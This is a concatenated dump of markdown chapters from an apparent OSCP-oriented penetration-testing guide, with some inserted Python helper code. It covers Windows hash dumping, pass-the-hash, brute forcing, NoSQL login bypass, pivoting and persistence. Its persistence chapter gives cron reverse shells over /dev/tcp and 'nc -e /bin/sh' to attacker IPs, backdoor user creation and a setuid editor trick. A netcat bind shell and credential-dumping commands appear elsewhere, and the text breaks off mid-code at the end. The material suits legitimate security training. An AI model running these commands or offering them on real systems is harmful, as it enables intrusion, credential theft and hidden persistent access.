Windows stores local account password hashes in the SAM (Security Account Manager). Hashes are stored differently depending on the operating system. Up to and including Windows 2003 the passwords were stored both as LAN Manager (LM) and NT LAN Manager (NT) hashes. LM is incredibly insecure: the password is upper-cased, padded to 14 characters and split into two 7-character halves that are hashed independently, so each half can be cracked on its own. From Windows Vista on, LM hashes are no longer stored by default, only the NT hash (an unsalted MD4 of the UTF-16LE password), which is somewhat more secure but still fast to crack and directly usable in pass-the-hash.
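As an added example (not from the original guide), the following serves two passages at once: the "Identify hash" section of the offline-cracking chapter, whose three clues (length, character set, special prefix) it turns into a small classifier, and this Windows section, whose pwdump-style `user:RID:LM:NT:::` lines it parses to tell you whether an LM hash is present and whether the password is blank. The classification table is this example's own assumption and covers only the hash types the guide mentions; the hashcat mode numbers are the ones `hashcat --help` prints for those types.

```python
"""Added example, not from the original guide: a hash classifier built on
length / character set / prefix, and a parser for pwdump-style lines.
The type table and the flag names are this example's own assumptions."""

import re

# Prefixed (salted) formats the guide mentions -> (name, hashcat mode).
PREFIX_TYPES = {
    "$apr1$": ("Apache MD5 (md5apr1)", 1600),
    "$1$":    ("md5crypt (Unix MD5)", 500),
    "$5$":    ("sha256crypt", 7400),
    "$6$":    ("sha512crypt", 1800),
}
# Unsalted hex digests are ambiguous: several algorithms share a length.
HEX_LENGTH_TYPES = {
    32:  ["MD5 (0)", "NTLM (1000)", "LM (3000)", "MD4 (900)"],
    40:  ["SHA-1 (100)"],
    64:  ["SHA-256 (1400)"],
    128: ["SHA-512 (1700)"],
}

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password


def identify(h: str) -> list:
    """Return candidate 'name (hashcat mode)' strings for one hash."""
    h = h.strip()
    for prefix, (name, mode) in PREFIX_TYPES.items():
        if h.startswith(prefix):                 # special characters decide
            return [f"{name} ({mode})"]
    if re.fullmatch(r"[0-9a-fA-F]+", h):         # character set: hex only
        return HEX_LENGTH_TYPES.get(len(h), ["unknown hex digest"])  # then length
    return ["unknown"]


def parse_pwdump(line: str) -> dict:
    """Parse 'user:rid:LM:NT:::' and flag what is worth cracking."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    lm, nt = lm.lower(), nt.lower()
    # A real LM hash is 32 hex chars; 'NO PASSWORD****' or the empty-password
    # value means LM storage is disabled or the password is blank.
    lm_present = re.fullmatch(r"[0-9a-f]{32}", lm) is not None and lm != EMPTY_LM
    return {
        "user": user,
        "rid": int(rid),
        "lm_present": lm_present,                      # crack each 7-char half
        "lm_short": lm_present and lm[16:] == EMPTY_LM[16:],  # password <= 7 chars
        "nt_empty": nt == EMPTY_NT,                    # blank password
        "nt": nt,
    }


if __name__ == "__main__":
    print(identify("$apr1$salt$hashvalue"))
    print(identify("6f403d3166024568403a94c3a6561896"))
    print(parse_pwdump("bob:1001:6c3d4c343f999422aad3b435b51404ee:"
                       "bcd477bfdb45435a34c6a38403ca4364:::"))
```

Note the second half of an LM hash: when it equals `aad3b435b51404ee` the password is at most 7 characters, which halves the work even before cracking starts.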

**LM and NT hashes: up to and including Windows 2003**

**NT hash only: Windows Vista and later**

### LM Hashes

LM hashes can be really easy to crack. In the pwdump-format line below (`user:RID:LM:NT:::`) the LM hash is the first hash field. Note that its second half, `AAD3B435B51404EE`, is the LM hash of an empty 7-character block, which tells you the password is 7 characters or shorter.

```
Administrator:500:FA21A6D3CF(01B8BAAD3B435B51404EE:C294D192B82B6AA35C3DFCA81F1F59BC:::
```

Example of NT only (LM storage disabled, so the LM field is a placeholder):

```
Administrator:500:NO PASSWORD*********************:BE134K40129560B46534340292AF4E72:::
```

### fgdump.exe

We can use `fgdump.exe` (`locate fgdump.exe` on Kali) to extract NT and LM password hashes. Run it and there is a file called `127.0.0.1.pwdump` where the hashes are saved. Now you can try to crack them offline.

### Windows Credential Editor (WCE)

WCE can dump NT hashes from memory and, with `-w`, cleartext passwords from the logon sessions that still hold them. There are different versions of WCE, one for 32-bit systems and one for 64-bit, so make sure you have the right one.

You can run it like this:

```
wce32.exe -w
```

### Loot registry without tools

This might be a better technique than using tools like WCE and fgdump, since you don't have to upload any binaries; `reg.exe` is already on the box. Save the hives (requires administrator):

```
C:\> reg.exe save hklm\sam c:\windows\temp\sam.save
C:\> reg.exe save hklm\security c:\windows\temp\security.save
C:\> reg.exe save hklm\system c:\windows\temp\system.save
```

Copy the files to your machine and extract the hashes offline with impacket's `secretsdump.py` (`secretsdump.py -sam sam.save -system system.save -security security.save LOCAL`) or `pwdump`. Remember to delete the saved hives from the target afterwards.

### Pwdump 7

http://www.tarasco.org/security/pwdump_7/

## VNC

VNC requires its own password to log in, which is not the same as the user's Windows password. If you have a meterpreter shell you can run the post-exploitation module to get the VNC password.
99 | 100 | ``` 101 | background 102 | use post/windows/gather/credentials/vnc 103 | set session X 104 | exploit 105 | ``` 106 | 107 | ## Tcp-dump on winfows 108 | 109 | You can use meterpreter to easily take a tcp-dump, like this: 110 | 111 | ``` 112 | # Meterpreter 113 | run packetrecorder -li 114 | run packetrecorder -i 1 115 | ``` 116 | 117 | ### Search for interesting files 118 | 119 | ``` 120 | #Meterpreter 121 | search -f *.txt 122 | search -f *.zip 123 | search -f *.doc 124 | search -f *.xls 125 | search -f config* 126 | search -f *.rar 127 | search -f *.docx 128 | search -f *.sql 129 | 130 | # Recursive search 131 | dir /s 132 | ``` 133 | 134 | 135 | 136 | ## References 137 | 138 | This is a great post 139 | https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ -------------------------------------------------------------------------------- /main-stackframe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/main-stackframe.png -------------------------------------------------------------------------------- /metasploit.md: -------------------------------------------------------------------------------- 1 | # Metasploit 2 | 3 | 4 | Well metasploit is of course way to big to treat in a simple book like this. But I am going to give it a shot anyways. Because what he hell, it is not like this book has a word-limit. 5 | 6 | -------------------------------------------------------------------------------- /meterpreter.md: -------------------------------------------------------------------------------- 1 | # Meterpreter 2 | 3 | Meterpreter is metasploits own shell. It runs in memory so it leaves no trace on disk. And it has a few other stealthy features. It also communicated encrypted. So that is good. 4 | 5 | There are several versions of meterpreter. 
What it can do depends on the OS and on how it was executed: a PHP meterpreter has one set of functionality, a native binary meterpreter another, and the same goes for different operating systems. To see which commands your meterpreter session supports, run `?` (or `help`) in meterpreter and it will list every command you have access to.

-------------------------------------------------------------------------------- /modules.md: --------------------------------------------------------------------------------
# Modules

-------------------------------------------------------------------------------- /msfvenom---create-shellcode.md: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/msfvenom---create-shellcode.md

-------------------------------------------------------------------------------- /netcat.md: --------------------------------------------------------------------------------
# Netcat

Hand over a shell (a bind shell: the listener executes the shell and gives it to whoever connects):

```
root$ nc -lvp 4444 -e /bin/bash
```

Now connect to it from another user (the port must match the listener's, 4444):

```
otheruser$ nc 192.168.1.101 4444
whoami
root
```

The same thing can be done in reverse (a reverse shell): we listen, and the side that connects to us runs `nc -e /bin/bash` and hands us its shell. Note that `-e` is not available in every netcat build (the OpenBSD variant shipped by many Debian-based systems lacks it).

-------------------------------------------------------------------------------- /network_traffic.md: --------------------------------------------------------------------------------
# Network traffic

So you have entered a network and it is time to start mapping it. It is probably a good idea to start by monitoring the traffic.

-------------------------------------------------------------------------------- /networking.md: --------------------------------------------------------------------------------
# Networking

This is just some basics of networking.

## Sockets

BSD Sockets (Berkeley Software Distribution)

### Socket API

The socket API exists in most programming languages. It usually looks something like this:

- `socket` - create a new connection endpoint
- `bind` - attach the endpoint to a local address and port
- `listen` - mark the endpoint as passive, ready to accept incoming connections
- `accept` - take the next queued incoming connection and return a new socket for it
- `connect` - initiate a connection to a remote address (client side)
- `send` - write data to the connection
- `recv` (receive) - read data from the connection
- `close` - tear the endpoint down

The server side goes socket, bind, listen, accept; the client side goes socket, connect; both then send and receive until one of them closes.

## References

https://www.youtube.com/watch?v=zWqLYby99EU

-------------------------------------------------------------------------------- /nosql-injections.md: --------------------------------------------------------------------------------
# Nosql-injections

NoSQL databases like MongoDB are becoming more and more common, so this needs to be expanded.

## Login bypass

If the application passes a JSON body (or Express/PHP-style `user[$gt]=` query parameters) straight into the MongoDB query, the attacker can substitute a query operator for the expected string. Basically, change the query to this:

```javascript
{"user":{"$gt": ""},"pass":{"$gt": ""}}
```

`{"$gt": ""}` matches every non-empty string, so the lookup `{"user": <input>, "pass": <input>}` matches the first user in the collection and the login succeeds without knowing any password.

http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html
http://blog.websecurify.com/2014/08/attacks-nodejs-and-mongodb-part-to.html

-------------------------------------------------------------------------------- /online_password_cracking.md: --------------------------------------------------------------------------------
# Online password cracking

There are several tools specialized for online brute forcing, and several services that are common targets. For example: VNC, SSH, FTP, SNMP, POP3, HTTP.

## Port 22 - SSH

```
hydra -l root -P wordlist.txt 192.168.0.101 ssh
hydra -L userlist.txt -P best1050.txt 192.168.1.103 -s 22 ssh -V
```

## Port 80/443 htaccess

You can password protect directories with Apache pretty easily; just configure the htaccess (I explain this in the chapter on Common ports).

It can then be brute forced like this:

```
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
```

### Logins

Use Burp Suite.

1. Intercept a login attempt.
2. Right-click, "Send to Intruder". Select Sniper if you have only one field you want to brute force (for example if you already know the username). Otherwise select Cluster bomb, which tries every combination of two payload sets (usernames and passwords).
3. Select your payload, i.e. your wordlist.
4. Click attack.
5. Look for a response length (or status code) that differs from the rest.

## Port 161 - SNMP

```
hydra -P wordlist.txt -v 192.168.0.101 snmp
```

## Port 3389 - Remote Desktop Protocol

For RDP we can use Ncrack.

```
ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101
```

-------------------------------------------------------------------------------- /oscp.md: --------------------------------------------------------------------------------
# OSCP

So part of the reason I have been working on this document/notepad/book is to prepare for the OSCP exam.

Here are its guidelines:
https://support.offensive-security.com/#!oscp-exam-guide.md

## Highlights From the Guide

### Exam Proofs: Linux

> On all Linux targets, you must have a root shell to receive full points. You must provide the contents of the proof files IN A SHELL (web, bind, reverse, or ssh) with the "cat" command from their original location. Obtaining the contents of the proof files in any other way will result in zero points for the target machine.

### Forbidden tools

- Spoofing (IP, ARP, DNS, NBNS, etc)
- Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
- Automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc.)
- Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc.)
- Features in other tools that utilize either forbidden or restricted exam limitations

### Exam restrictions

> The usage of Metasploit is restricted for the exam.
You can only use Metasploit Auxiliary, Exploit, and Post modules against one target machine of your choice. Once you have selected your one target machine, you can not use Metasploit Auxiliary, Exploit, and Post modules against any other machines.

Listed separately in the guide and not subject to the single-machine restriction:

```
multi handler (aka exploit/multi/handler)
meterpreter
msfpayload & msfencode
msfvenom
```

-------------------------------------------------------------------------------- /pass_the_hash_-_reusing_hashes.md: --------------------------------------------------------------------------------
# Pass the hash - reusing hashes

Pass the hash (PTH) is a technique that lets you authenticate with a valid username and the NT hash instead of the cleartext password, because NTLM authentication only ever proves knowledge of the hash. So if you have got hold of a hash you might be able to use it against another system without cracking it. Local administrator accounts that share the same password across machines are the classic case.

Pass the hash is also the name of a suite of patched tools (`pth-winexe`, `pth-smbclient`, etc.) that accept a hash where a password is expected.

## SMB

We will authenticate against an SMB service. One way is to put the hash (`LM:NT`) in an environment variable using `export`:

```
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
```
```
pth-winexe -U administrator //192.168.1.101 cmd
```

You can also pass the hash directly in the `-U` argument, in the form `user%LMHASH:NTHASH`:

```
pth-winexe -U 'administrator%aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896' //192.168.0.101 cmd
```

## Remote Desktop

```
apt-get update
apt-get install freerdp-x11
```

```
xfreerdp /u:admin /d:win7 /pth:NTHASH /v:192.168.1.101
```

`/pth:` takes the NT hash only. Note that RDP pass-the-hash only works when Restricted Admin mode is enabled on the target.

https://www.kali.org/penetration-testing/passing-hash-remote-desktop/

-------------------------------------------------------------------------------- /passive_information_gatherig.md: --------------------------------------------------------------------------------
# Passive information gathering

It is passive in the sense that it doesn't directly send packets to the target's services.
But in any other sense of the word there is nothing passive about this phase. 4 | 5 | ## Visit the website 6 | 7 | Okay, I guess this actually sends packets to the target, but whatever. Visit the page, look around, read about the target. What do they do? 8 | 9 | ## Whois 10 | 11 | Find out who is behind the website. 12 | 13 | Resolve the DNS 14 | 15 | ``` 16 | host website.com 17 | nslookup website.com 18 | ``` 19 | 20 | The the IP address and check it with `whois` 21 | 22 | ``` 23 | whois 192.168.1.101 24 | ``` 25 | 26 | 27 | ## Netcraft 28 | 29 | Most of the info found on netcraft is not unique. It is basic whois info. But one thing is really good, it lists the different IP-addresses the page has had over the years. This can be a good way to **bypass cloudflare** and other services that hide the real IP. Using netcraft we can find the IP that was in use before they implemented cloudflare. 30 | 31 | Another detail that is good to know is the **hosting-company** or **domain-provider**. Those details can be used if we want to try some **social-engineering or spear-phishing attack**. 32 | 33 | [Netcraft](https://www.netcraft.com/) 34 | 35 | ## References 36 | 37 | http://www.technicalinfo.net/papers/PassiveInfoPart1.html -------------------------------------------------------------------------------- /password-cracking.md: -------------------------------------------------------------------------------- 1 | # Password Cracking 2 | 3 | 4 | 5 | ## Generate wordlists 6 | 7 | ## Offline 8 | 9 | ## Online 10 | 11 | ## Pass the hash -------------------------------------------------------------------------------- /payloads.md: -------------------------------------------------------------------------------- 1 | # Payloads 2 | 3 | 4 | There are three different types of payload modules. 5 | 6 | 1. Singles 7 | 2. Stagers 8 | 3. Stages 9 | 10 | 11 | ## Singles 12 | 13 | Singles are self-contained payloads. They can be caught with netcat for example. 

## Stagers

A stager is a small first-stage payload whose only job is to set up a network connection between the attacker and the target and then pull the rest of the payload over that connection. It is called a stager because it delivers the payload in stages: first the tiny connection setup, then a larger stage such as meterpreter over the established channel.

This matters when an exploit only gives you limited space for the payload: instead of sending one big payload you send a small stager and let it fetch the rest.

## Stages

Stages are the components that are downloaded by the stager (a meterpreter DLL, a full shell, etc.); they can be large because they are not subject to the exploit's size limit.

-------------------------------------------------------------------------------- /persistence.md: --------------------------------------------------------------------------------
# Persistence - Rootkit - Backdoor

If you manage to compromise a system you need to make sure that you do not lose the shell. If you have used an exploit that messes with the machine, the user might want to reboot, and if the user reboots you will lose your shell.

Or maybe the way to compromise the machine is really complicated or noisy, and you don't want to go through the hassle of doing it all again. So instead you create a backdoor that lets you get back in fast and easily.

## Create a new user

The most obvious, but not very subtle, way is to just create a new user (if you are root or have equivalent privileges):

```
adduser pelle
adduser pelle sudo
```

Now if the machine runs `ssh` you will be able to ssh into it.

On distributions without the Debian `adduser` wrapper (Red Hat-based ones, for example) you have to do:

```
useradd pelle
passwd pelle
echo "pelle ALL=(ALL) ALL" >> /etc/sudoers
```

## Crack the password of existing user

Get the `/etc/shadow` file and crack the passwords. This is of course only persistent until the user decides to change his/her password, so it is not that reliable.

## SSH key

Add your public key to an existing user's `~/.ssh/authorized_keys`. With `StrictModes` (the default) sshd ignores the file if it or the directory is writable by others, so use mode 700 on `.ssh` and 600 on the file. No password is needed afterwards, and it survives reboots and password changes.
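The two persistence mechanisms this chapter describes, an added SSH key and a crontab reverse shell, both leave a line in a file, which is also how you verify they will actually fire. As an added example (not from the original guide), here is a checker that validates the five-field cron schedule and flags commands that look like call-backs, and lists `authorized_keys` entries that carry no identifying comment. The sample crontab and key lines are constructed for this illustration; the indicator list and the field names are this example's own choices, not any tool's output format.

```python
"""Added example, not from the original guide: audit cron entries and
authorized_keys for the persistence artifacts this chapter describes.
Sample inputs are constructed; indicator list and field names are this
example's own assumptions."""

import re

# Constructed sample crontab (not from a real host).  The last entry has
# a broken schedule ('/10' instead of '*/10'): cron rejects it, so that
# backdoor never fires.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/10 * * * * bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.102/5556; sh <&196 >&196 2>&196'
*/10 * * * * nc -e /bin/sh 192.168.1.21 5556
/10 * * * * nc -e /bin/sh 192.168.1.21 5556
"""

# Constructed sample authorized_keys (key material is placeholder text).
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyDataOnly alice@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0example
"""

# Substrings that mark a cron command as a network call-back.
CALLBACK_INDICATORS = ("/dev/tcp/", "nc -e", "ncat -e", "bash -i",
                       "socat", "python -c", "perl -e")

# One cron field: '*', a number, a range a-b, comma lists, optional /step.
FIELD = re.compile(r"^(\*|\d+(-\d+)?)(,(\*|\d+(-\d+)?))*(/\d+)?$")


def valid_schedule(fields) -> bool:
    """True if the five schedule fields are syntactically valid cron."""
    return len(fields) == 5 and all(FIELD.match(f) for f in fields)


def audit_crontab(text: str) -> list:
    """Return one dict per entry: its command, whether the schedule parses,
    and whether the command matches a call-back indicator."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)            # 5 schedule fields + command
        fields = parts[:5]
        command = parts[5] if len(parts) > 5 else ""
        findings.append({
            "command": command,
            "valid_schedule": valid_schedule(fields),
            "callback": any(ind in command for ind in CALLBACK_INDICATORS),
        })
    return findings


def audit_authorized_keys(text: str) -> list:
    """Return (type, comment, unattributed) per key.  A key without a
    comment cannot be tied to a person and deserves a closer look."""
    keys = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith(("ssh-", "ecdsa-")):
            continue
        comment = parts[2] if len(parts) > 2 else ""
        keys.append({"type": parts[0], "comment": comment,
                     "unattributed": comment == ""})
    return keys


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f)
    for k in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        print(k)
```

Run it against `crontab -l` output and the user's `authorized_keys` both as the attacker (to confirm the entry is well-formed before you disconnect) and as the defender (to find someone else's).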

## Cronjob NC

Create a cronjob that connects back to your machine every 10 minutes. Here is an example using a bash reverse shell. You also need to set up a netcat listener.

Here is how you check if cron is running:

```
service crond status
pgrep cron
```

If it is not started you can start it like this:

```
service crond start
/etc/init.d/cron start
```

Cron runs its commands with `/bin/sh`, and `/dev/tcp` is a bash feature, so wrap the `/dev/tcp` reverse shell in `bash -c`:

```
crontab -e
*/10 * * * * bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.102/5556; sh <&196 >&196 2>&196'
```

Or, if the target's netcat supports `-e`:

```
*/10 * * * * nc -e /bin/sh 192.168.1.21 5556
```

Listener

```
nc -lvp 5556
```

A user field is only accepted in the system-wide crontab (`/etc/crontab`) and in files under `/etc/cron.d/`, not in a per-user `crontab -e`. If you write the entry there, you have to specify which user runs it:

```
*/10 * * * * pelle /path/to/binary
```

More here: http://kaoticcreations.blogspot.cl/2012/07/backdooring-unix-system-via-cron.html

## Metasploit persistence module

Create a binary with malicious content inside, run it, get a meterpreter shell, then run the metasploit persistence script.

https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/

If you have a meterpreter shell you can simply run `persistence`.

## Backdoor in webserver

You can put a cmd or shell backdoor on a webserver, either as a separate file or hidden inside an existing file.

## Admin account to CMS

Add an admin account to the CMS.

## Mysql-backdoor

Mysql backdoor

## Hide backdoor in bootblock

## Nmap

If the machine has nmap installed:

https://gist.github.com/dergachev/7916152

## Setuid on text-editor

You can set the setuid bit on an editor. Then if you can easily get in as `www-data`, you can escalate to root through the editor, because it runs as its owner (root).

With `vi` it is extremely easy.
You just run `:shell`, and it gives you a shell. Keep in mind that a setuid root binary is a loud artifact: `find / -perm -4000 -type f` will list it for any defender or other tester.

```
# Make root the owner of the file
chown root myBinary

# set the setuid bit (not the sticky bit, which is chmod +t and does something else)
chmod u+s myBinary
```

## References

Read this
https://gist.github.com/dergachev/7916152

This is a great introduction
http://www.dankalia.com/tutor/01005/0100501002.htm

-------------------------------------------------------------------------------- /physical_access_to_machine.md: --------------------------------------------------------------------------------
# Physical access to machine

If you have physical access to a machine whose disk is not encrypted, it is trivial to gain access to the hard drive and all files on it.

This is how you do it.

## Create linux-usb

Just follow this guide for Ubuntu:
http://www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu

## Boot into live-usb on victim machine

If the machine doesn't automatically boot from the USB stick you might have to enter the BIOS. This can usually be done by pressing F12 or F1 on boot. The BIOS looks different from machine to machine, but you just need to choose to boot from the USB device. (A BIOS password on the boot order or Secure Boot rejecting the live image stops this step.)

## Mount disk

Now that you have booted into the live USB, we need to mount the hard drive into the live system's filesystem. First we want to find out what partitions we have:

```
sudo su
fdisk -l
```

This will give you a list of partitions. They will look something like this:

```
/dev/sda1
/dev/sda2
```

Identify from the list the partition you want to mount.

Here we create a directory where we want to mount the partition:

```
mkdir /media/windows
```

```
mount -t ntfs /dev/sda1 /media/windows
```

`-t` means type, and refers to the filesystem type.
And we choose ntfs which is the windows-filesystem. 44 | 45 | Now you can access all the files from the harddrive in `/media/windows` 46 | 47 | ## Umount the disk 48 | 49 | Notice that is is `umount` and not unmount. 50 | 51 | ``` 52 | umount /media/windows 53 | ``` 54 | 55 | 56 | ## Dump the hashes 57 | 58 | https://prakharprasad.com/windows-password-cracking-using-john-the-ripper/ -------------------------------------------------------------------------------- /pivoting.md: -------------------------------------------------------------------------------- 1 | # Pivoting 2 | 3 | Let's say that you have compromised one machine on a network and you want to keep going to another machine. You will use the first machine as a staging point/plant/foothold to break into machine 2. Thid technique of using one compromised machine to access another is called pivoting. Machine one is the `pivot` in the example. The `pivot` is just used as a way to channel/tunnel our attack. 4 | 5 | #### Ipconfig 6 | 7 | We are looking for machines that have at least THREE network interfaces (loopback, eth0, and eth1 (or something)). These machines are connected to other networks, so we can use them to pivot. 8 | 9 | ``` 10 | # Windows 11 | ipconfig /all 12 | route print 13 | 14 | #Linux 15 | ifconfig 16 | ifconfig -a 17 | ``` 18 | 19 | ## Metasploit 20 | 21 | 22 | ### Ping-sweep the network 23 | 24 | First we want to scan the network to see what devices we can target. In this example we already have a meterpreter shell on a windows machine with SYSTEM-privileges. 25 | 26 | ``` 27 | meterpreter > run arp_scanner -r 192.168.1.0/24 28 | ``` 29 | This command will output all the devices on the netowork. 30 | 31 | ### Scan each host 32 | 33 | Now that we have a list of all available machines. We want to portscan them. 34 | 35 | We will to that portscan through metasploit. 
Using this module:

```
use auxiliary/scanner/portscan/tcp
```

If we run that module now it will only scan machines in the network we are already on. So first we need to route ourselves into the second network.

On the already-pwned machine we do:

```
ipconfig
```

Now we add the second network as a new route in Metasploit. First we background our session, and then do this:

```
# the ip address and the subnet mask, and then the meterpreter session
route add 192.168.11.1 255.255.255.0 1
```

Now we can run our port-scanning module:

```
use auxiliary/scanner/portscan/tcp
```

### Attack a specific port

In order to attack a specific port we need to forward it like this:

```
portfwd add -l 3389 -p 3389 -r 192.168.1.222
```

This is a good video explanation:
https://www.youtube.com/watch?v=c0XiaNAkjJA

https://www.offensive-security.com/metasploit-unleashed/pivoting/

http://ways2hack.com/how-to-do-pivoting-attack/

--------------------------------------------------------------------------------
/port_knocking.md:
--------------------------------------------------------------------------------

# Port knocking

Port knocking is a security-through-obscurity technique. It basically means that after knocking on ports in a specific sequence a certain port will open automatically. It seems to be more popular in Capture-the-Flag contests than in real-life networks. But I have included it anyway, since CTFs are great.

This is a way to hide certain ports, so you don't get unwanted intrusion attempts.

So for example, imagine you access your server through `ssh`, but you are tired of getting unwanted brute-force attempts all day long.
You can just have the SSH port closed, and when you knock on certain ports in a specific order the SSH port opens up, maybe for a few minutes, or maybe indefinitely until you close it again.

When you "knock" on a port you are really just sending a TCP packet with the `SYN` flag set to that port. A closed port will then respond with `RST/ACK`, which basically means that the host has received the `TCP` packet and ACKnowledges it, but responds with a Reset (`RST`) flag. `RST` just means that the port is closed.

## Software to implement port-knocking

I have seen the Knock software implemented.

## Opening

So, how do we actually knock?
As mentioned before, a knock is essentially just sending a packet to a specific port.
I guess there are quite a few ways to do this. But here are three ways.

1. Knock
   - `apt-get install knockd`
   - Then you simply type: `knock [ip] [port...]`. For example: `knock 192.168.1.102 4000 5000 6000`
   - After that you have to scan the target to see if any new port is open.
   - If you know which port is open you can connect to it using netcat. The following command would work: `nc 192.168.1.102 8888`. This would then connect to the port.

2. Nmap/bash
   - `for x in 4000 5000 6000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done`

3. Netcat

   ```
   nc 192.168.1.102 4000
   nc 192.168.1.102 5000
   nc 192.168.1.102 6000
   nc 192.168.1.102 8888
   ```

## Break it

One way to get into a server with port knocking implemented would be to sniff for packets on the network. So if you are on the same network and able to perform a MITM, you can just sniff that traffic and then find the sequence.

## Pitfalls

Using port knocking as a way to secure your service might come with some risk. The biggest risk, I suppose, is that if the knock daemon fails, for whatever reason.
You will be shut out of your machine. There are of course ways to just restart the knock daemon if it fails. But maybe that daemon fails as well.

### References

This Wikipedia article is really worth reading:
https://en.wikipedia.org/wiki/Port_knocking

--------------------------------------------------------------------------------
/port_scanning.md:
--------------------------------------------------------------------------------

# Port Scanning

## TLDR

```
# Stealthy
nmap -sS 10.11.1.X

# Scan all ports, might take a while.
nmap 10.11.1.X -p-

# Scan for UDP
nmap 10.11.1.X -sU
unicornscan -mU -v -I 10.11.1.X

# Scan for version, with NSE-scripts and trying to identify OS
nmap 10.11.1.X -sV -sC -O

# All out monsterscan
nmap -vvv -Pn -A -iL listOfIP.txt

# Fast scan
nmap 10.11.1.X -F

# Only scan the 100 most common ports
nmap 10.11.1.X --top-ports 100
```

## Nmap

Now that you have gathered some IP addresses from your subdomain scanning it is time to scan those addresses. You just copy-paste those addresses and add them to a file, line by line. Then you can scan all of them with nmap at the same time, using the `-iL` flag.

### Basics - tcp-connect scan

Okay, so a bit of the basics of Nmap and how it works. When one machine initiates a connection with another machine using the **Transmission Control Protocol (TCP)** it performs what is known as a three-way handshake. That means:

```
machine1 sends a syn packet to machine2
machine2 sends a syn-ack packet to machine1
machine1 sends an ack packet to machine2.
```

If machine2 responds with a syn-ack we know that that port is open. This is basically what nmap does when it scans for a port.
If machine1 omits the last ack packet the connection is not made.
This can be a way to make less noise.

This is the default mode for nmap. If you do not add any flags and scan a machine this is the type of connection it creates.

### "Stealthy" -sS

By adding the `-sS` flag we are telling nmap not to finalize the three-way handshake. It will send a `syn`, receive `syn-ack` (if the port is open), and then terminate the connection. This used to be considered stealthy, since it was often not logged. However, it should not be considered stealthy anymore.

In the flag I imagine that the first `s` stands for scan/scantype and the second `S` stands for `syn`.

So `-sS` can be read as **scantype syn**.

### UDP scan

UDP is, after TCP, the most common protocol. DNS (53), SNMP (161/162) and DHCP (67/68) are some common UDP services. Scanning for it is slow and unreliable.

```
-sU
```

#### Output scan to a textfile

Not all output works with the grepable format. For example NSE output does not work with grepable. So you might want to use XML instead.

```
# To text-file
-oN nameOfFile

# To grepable format
-oG nameOfFile

# To xml
-oX nameOfFile
```

### Scan an entire IP-range

You might find that a site has several machines on the same IP range. You can then use nmap to scan the whole range.

The `-sn` flag stops nmap from running port scans, so it speeds up the process.

```
nmap -vvv -sn 201.210.67.0/24
```

You can also specify a specific range, like this:

```
nmap -sP 201.210.67.0-100
```

#### Sort out the machines that are up

So let's say you find that 40 machines exist in that range. We can use grep to output those IPs.

First let's find the IPs that were online. `ip-range.txt` is the output from the previous command. You can of course combine them all.
```bash
cat ip-range.txt | grep -B 1 "Host is up"
```

Now let's sort out the IPs from that file:

```bash
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' ip-range.txt > only-ip.txt
```

Now you can input all those IPs to nmap and scan them.

#### Scan a range and output if a specific port is open

Nmap has a flag to make the output grepable (`-oG -` writes it to stdout):

```bash
nmap -vvv -p 80 201.210.67.0-100 -oG - | grep 80/open
```

### Nmap scripts

This chapter could also be placed in Vulnerability analysis and Exploitation, because nmap scripting is a really versatile tool that can do many things. Here we will focus on its ability to retrieve information that can be useful in the process to **find vulnerabilities**.

First locate the nmap scripts. Nmap scripts end in `.nse`, for Nmap Script Engine.

```
locate *.nse
```

The syntax for running a script is:

```
nmap --script scriptname 192.168.1.101
```

To find the "man"-page, the info about a script, we write:

```
nmap --script-help http-vuln-cve2013-0156.nse
```

**Run multiple scripts**

Can be run by separating the scripts with a comma:

```
nmap --script script1.nse,script2.nse,script3.nse 192.168.1.101
```

Run the default scripts:

```
nmap -sC example.com
```

## Metasploit

We can do port scanning with Metasploit and nmap. And we can even integrate nmap into Metasploit. This might be a good way to keep your process neat and organized.
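The two grep one-liners in the port-scanning section above (`grep -B 1 "Host is up"` and `grep 80/open`) can be replaced by a proper parser of nmap's grepable (`-oG`) format. The block below is an added example, not code from the original guide: it parses a constructed sample of `nmap -vvv -p 22,80 -oG -` output (the IPs, hostname and port states are made up for the example) into a per-host structure and answers both questions, which hosts are up and which hosts have a given port open, from the same data.

```python
"""Parse nmap grepable (-oG) output offline: which hosts are up, and which
hosts have a given port open.  Added example, not part of the original guide."""
import re
from collections import defaultdict

# Constructed sample of `nmap -vvv -p 22,80 -oG -` output (not a real scan).
SAMPLE_OG = """\
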